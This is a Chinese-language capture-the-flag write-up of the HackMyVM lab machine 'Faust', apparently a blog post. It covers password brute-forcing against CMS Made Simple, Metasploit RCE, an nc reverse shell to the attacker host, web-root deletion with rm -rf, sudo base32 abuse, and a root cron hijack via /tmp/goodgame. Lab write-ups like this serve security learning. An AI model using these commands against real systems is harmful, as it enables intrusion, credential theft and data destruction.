Loading

[HMV] Faust

0x00 配置

攻击机 IP: 172.16.1.25

靶机 IP: 172.16.1.167


0x01 攻击

使用 Nmap 扫描目标靶机开放的端口

┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.167
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 172.16.1.167
Host is up (0.00051s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 540a75c52656f5b05f6de1e07715c70d (RSA)
|   256 0bd789522d1316cb7496f55fdd3e528e (ECDSA)
|_  256 5a900cf52b7fba1c83024de7a2a21d5b (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
|_http-title: Home - cool_cms
6660/tcp open  unknown
| fingerprint-strings: 
|   NULL, Socks5: 
|     MESSAGE FOR WWW-DATA:
|     [31m www-data I offer you a dilemma: if you agree to destroy all your stupid work, then you have a reward in my house...
|_    Paul
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port6660-TCP:V=7.93%I=7%D=4/4%Time=642B6734%P=x86_64-pc-linux-gnu%r(NUL
SF:L,A5,"\n\n\x20\x20\x20MESSAGE\x20FOR\x20WWW-DATA:\n\n\x20\x1b\[31m\x20\
SF:x20www-data\x20I\x20offer\x20you\x20a\x20dilemma:\x20if\x20you\x20agree
SF:\x20to\x20destroy\x20all\x20your\x20stupid\x20work,\x20then\x20you\x20h
SF:ave\x20a\x20reward\x20in\x20my\x20house\.\.\.\n\x20\x20\x20Paul\x20\x1b
SF:\[0m\n")%r(Socks5,A5,"\n\n\x20\x20\x20MESSAGE\x20FOR\x20WWW-DATA:\n\n\x
SF:20\x1b\[31m\x20\x20www-data\x20I\x20offer\x20you\x20a\x20dilemma:\x20if
SF:\x20you\x20agree\x20to\x20destroy\x20all\x20your\x20stupid\x20work,\x20
SF:then\x20you\x20have\x20a\x20reward\x20in\x20my\x20house\.\.\.\n\x20\x20
SF:\x20Paul\x20\x1b\[0m\n");
MAC Address: 08:00:27:49:EA:66 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect res

发现了三个端口,22 (SSH)、80 (HTTP) 和一个奇怪的 6660 端口,其中 6660 端口返回了一条信息

MESSAGE FOR WWW-DATA:

www-data I offer you a dilemma: if you agree to destroy all your stupid work, then you have a reward in my house...

Paul

暂时不知道这个有什么用,先看 Web

image-20230404083548815

打开后发现了 CMS Made Simple 框架,同时也列出了版本号,搜索可以利用的漏洞

image-20230404083726349

发现一个 RCE 漏洞,但是漏洞利用的前置条件是拥有用户名和密码。在首页的 News 板块发现了一个可能的用户名 admin

image-20230404083924711

使用 dirsearch 扫描后台,得到了几个有用的目录

┌──(root㉿Kali-VM)-[~]
└─# dirsearch -u http://172.16.1.167/                                                                                           
  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://172.16.1.167/

[07:59:42] Starting: 
[07:59:43] 403 -  277B  - /.ht_wsr.txt                                     
[07:59:43] 403 -  277B  - /.htaccess.bak1
[07:59:43] 403 -  277B  - /.htaccess.orig
[07:59:43] 403 -  277B  - /.htaccessBAK
[07:59:43] 403 -  277B  - /.htaccess_sc
[07:59:43] 403 -  277B  - /.htaccess.sample
[07:59:43] 403 -  277B  - /.htaccess_orig
[07:59:43] 403 -  277B  - /.htaccess.save
[07:59:43] 403 -  277B  - /.htaccessOLD2
[07:59:43] 403 -  277B  - /.htaccessOLD
[07:59:43] 403 -  277B  - /.htaccess_extra
[07:59:43] 403 -  277B  - /.htm
[07:59:43] 403 -  277B  - /.html                                           
[07:59:43] 403 -  277B  - /.htpasswd_test
[07:59:43] 403 -  277B  - /.htpasswds
[07:59:43] 403 -  277B  - /.httr-oauth
[07:59:44] 403 -  277B  - /.php                                            
[07:59:47] 301 -  312B  - /admin  ->  http://172.16.1.167/admin/            
[07:59:47] 403 -  277B  - /admin/.htaccess                                  
[07:59:47] 302 -    0B  - /admin/  ->  http://172.16.1.167/admin/login.php
[07:59:47] 302 -    0B  - /admin/?/login  ->  http://172.16.1.167/admin/login.php
[07:59:47] 302 -    0B  - /admin/index.php  ->  http://172.16.1.167/admin/login.php
[07:59:47] 200 -    4KB - /admin/login.php                                  
[07:59:50] 301 -  313B  - /assets  ->  http://172.16.1.167/assets/          
[07:59:50] 200 -    2KB - /assets/                                          
[07:59:52] 200 -    0B  - /config.php                                       
[07:59:53] 200 -   24B  - /doc/                                             
[07:59:53] 301 -  310B  - /doc  ->  http://172.16.1.167/doc/
[07:59:56] 200 -   19KB - /index.php                                        
[07:59:57] 301 -  310B  - /lib  ->  http://172.16.1.167/lib/                
[07:59:57] 200 -   24B  - /lib/                                             
[07:59:58] 301 -  314B  - /modules  ->  http://172.16.1.167/modules/        
[07:59:58] 200 -    3KB - /modules/                                         
[08:00:02] 403 -  277B  - /server-status                                    
[08:00:02] 403 -  277B  - /server-status/                                   
[08:00:05] 301 -  310B  - /tmp  ->  http://172.16.1.167/tmp/                
[08:00:05] 200 -    1KB - /tmp/                                             
[08:00:05] 301 -  314B  - /uploads  ->  http://172.16.1.167/uploads/        
[08:00:05] 200 -    0B  - /uploads/
                                                                             
Task Completed

在 /login 下发现了登录入口

image-20230404084104035

使用用户名 admin,然后随便输入一个密码,使用 BurpSuite 对请求抓包

image-20230404084203036

发现请求体并没有做额外的加密或者编码,这意味着我们可以直接通过字典来枚举密码。把请求数据导入到攻击器

image-20230404084314482

我们先使用 SecLists 中的密码字典来枚举密码

image-20230404084411948

很快就得到了一个有效的相应,密码就在其中

image-20230404084451037

得到了用户名和密码,我们就可以继续利用 RCE 漏洞。因为 searchsploit 中导出的 Python 脚本似乎不能用,所以我换成了 msfconsole

image-20230404084600494

我们查看这个漏洞利用所需的参数,然后设置好它们

image-20230404084631642

很快我们就得到了 Shell

image-20230404084704360

为了操作方便,我先用 nc 将 Shell 反弹出来,然后在 Kali 中操作 Shell

nc -c /bin/bash 172.16.1.25 5001

┌──(root㉿Kali-VM)-[~]
└─# nc -lvnp 5001
listening on [any] 5001 ...
connect to [172.16.1.25] from (UNKNOWN) [172.16.1.167] 42792
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@debian:/var/www/html/uploads$ :)

得到 www 用户后,我们先查看靶机中存在的其他用户

www-data@debian:/var/www/html/uploads$ cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
paul:x:1001:1001:,,,:/home/paul:/bin/bash
nico:x:1000:1000:,,,:/home/nico:/bin/bash

发现了 paul 和 nico 用户,似乎我们应该先得到它们,最后成为 root。先在 www 用户中寻找提权的方法。结合之前 paul 给 www 的提示

MESSAGE FOR WWW-DATA:

www-data I offer you a dilemma: if you agree to destroy all your stupid work, then you have a reward in my house...

Paul

猜测需要删除 www 目录下的某些文件

www-data@debian:/var/www/html$ rm -rf ./*
rm -rf ./*

删除文件后查看 /home/paul,发现了一个 password.txt

www-data@debian:/var/www/html$ ls -al /home/paul
ls -al /home/paul
total 36
drwxr-xr-x 3 paul paul 4096 Apr  4 02:18 .
drwxr-xr-x 4 root root 4096 Apr  1  2021 ..
-rw------- 1 paul paul   52 Apr  4 02:18 .Xauthority
lrwxrwxrwx 1 root root    9 Apr  1  2021 .bash_history -> /dev/null
-rw-r--r-- 1 paul paul  220 Apr  1  2021 .bash_logout
-rw-r--r-- 1 paul paul 3526 Apr  1  2021 .bashrc
drwx------ 3 paul paul 4096 Apr  6  2021 .local
-rw-r--r-- 1 paul paul  807 Apr  1  2021 .profile
-rw-r--r-- 1 paul paul   66 Apr  1  2021 .selected_editor
-rw-r--r-- 1 paul paul   30 Apr  4 02:57 password.txt

我们对 password.txt 具有读取权限,使用 cat 命令查看文件内容

www-data@debian:/var/www/html$ cat /home/paul/password.txt
cat /home/paul/password.txt
Password is: YouCanBecomePaul

得到了 paul 用户的密码,使用 SSH 登录

[C:\~]$ ssh paul@172.16.1.167

Connecting to 172.16.1.167:22...
Connection established.
To escape to local shell, press Ctrl+Alt+].

Linux debian 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

paul@debian:~$ :)

登录成功后继续寻找提权到 nico 的方法,查看 paul 可以运行的 Sudo 命令

paul@debian:~$ sudo -l
[sudo] Mot de passe de paul : 
Entrées par défaut pour paul sur debian :
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

L'utilisateur paul peut utiliser les commandes suivantes sur debian :
    (nico) /usr/bin/base32

发现 paul 可以以 nico 的身份运行 /usr/bin/base32,猜测是用来获得 nico 家目录下的某个文件的,ls 一下 /home/nico

paul@debian:~$ ls -al /home/nico/
total 32
drwxr-xr-x 3 nico nico 4096 avril  1  2021 .
drwxr-xr-x 4 root root 4096 avril  1  2021 ..
lrwxrwxrwx 1 root root    9 avril  1  2021 .bash_history -> /dev/null
-rw-r--r-- 1 nico nico  220 avril  1  2021 .bash_logout
-rw-r--r-- 1 nico nico 3526 avril  1  2021 .bashrc
drwxr-xr-x 3 nico nico 4096 avril  1  2021 .local
-rw-r--r-- 1 nico nico  807 avril  1  2021 .profile
-rwx------ 1 nico nico   37 avril  1  2021 .secret.txt
-rwx------ 1 nico nico   11 avril  1  2021 user.txt

果然发现了 .secret.txt,尝试使用 base32 读取它

paul@debian:~$ sudo -u nico /usr/bin/base32 /home/nico/.secret.txt
KVEGGZ2QKQ2GOYLOKZ5GIRRZOZRG2VTGMJLTS6K2KY4WSWSXKZ4USQJ5HUFA====

得到了经过 BASE32 编码的文件内容,再使用 base32 -d 解密

┌──(root㉿Kali-VM)-[~]
└─# echo "KVEGGZ2QKQ2GOYLOKZ5GIRRZOZRG2VTGMJLTS6K2KY4WSWSXKZ4USQJ5HUFA====" | base32 -d
UHcgPT4ganVzdF9vbmVfbW9yZV9iZWVyIA==

似乎又得到了一串 BASE64,再解密一下

┌──(root㉿Kali-VM)-[~]
└─# echo "UHcgPT4ganVzdF9vbmVfbW9yZV9iZWVyIA==" | base64 -d                            
Pw => just_one_more_beer

得到了用户 nico 的密码,使用 SSH 登录

[C:\~]$ ssh nico@172.16.1.167

Connecting to 172.16.1.167:22...
Connection established.
To escape to local shell, press Ctrl+Alt+].

Linux debian 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

nico@debian:~$ :)

获得 user flag

nico@debian:~$ cat user.txt
gamhanarhu

继续寻找提权方法,发现 nico 无法运行 Sudo

nico@debian:~$ sudo -l
[sudo] Mot de passe de nico : 
Désolé, l'utilisateur nico ne peut pas utiliser sudo sur debian.

在根目录找到了一个 /nico 文件夹

nico@debian:~$ ls -al /nico
total 56
drwx------  2 nico nico  4096 avril  1  2021 .
drwxr-xr-x 19 root root  4096 avril  1  2021 ..
-rwxrwx---  1 nico root 47162 avril  1  2021 homer.jpg

里面有一张照片,JPG 格式猜测有 steghide 隐写,使用 Python 搭建简易 HTTP 服务器把它传输到 Kali 中

┌──(root㉿Kali-VM)-[~/work]
└─# stegseek ./homer.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "note.txt".
[i] Extracting to "homer.jpg.out".
                                   
┌──(root㉿Kali-VM)-[~/work]
└─# cat homer.jpg.out 
my /tmp/goodgame file was so good... but I lost it

# D'oh!

发现了一个提示,/tmp/goodgame 很棒,但是我弄丢了它。使用 pspy 查看计划任务,发现会以 root 身份定时指定 /tmp/goodgame

| /bin/sh -c /tmp/goodgame 
| /bin/sh /tmp/goodgame

在 /tmp/goodgame 里放置反弹 Shell 脚本,然后等待 Shell 反弹

┌──(root㉿Kali-VM)-[~/work]
└─# nc -lvnp 5002
listening on [any] 5002 ...
connect to [172.16.1.25] from (UNKNOWN) [172.16.1.167] 42908
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@debian:~# :)

最后得到 root flag

root@debian:~# ls -al
ls -al
total 32
drwx------  3 root root 4096 avril  2  2021 .
drwxr-xr-x 19 root root 4096 avril  1  2021 ..
lrwxrwxrwx  1 root root    9 avril  1  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 janv. 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 avril  1  2021 .local
-rw-------  1 root root 1285 avril  1  2021 .mysql_history
-rw-r--r--  1 root root  148 août  17  2015 .profile
-rw-r--r--  1 root root   13 avril  1  2021 root.txt
-rw-r--r--  1 root root   66 avril  1  2021 .selected_editor

root@debian:~# cat root.txt
cat root.txt
lasarnsilgam

0x02 总结

删 /var/www/html 的地方很有脑洞,提权阶段也比较有趣

posted @ 2023-04-04 09:11  20206675  阅读(199)  评论(0编辑  收藏  举报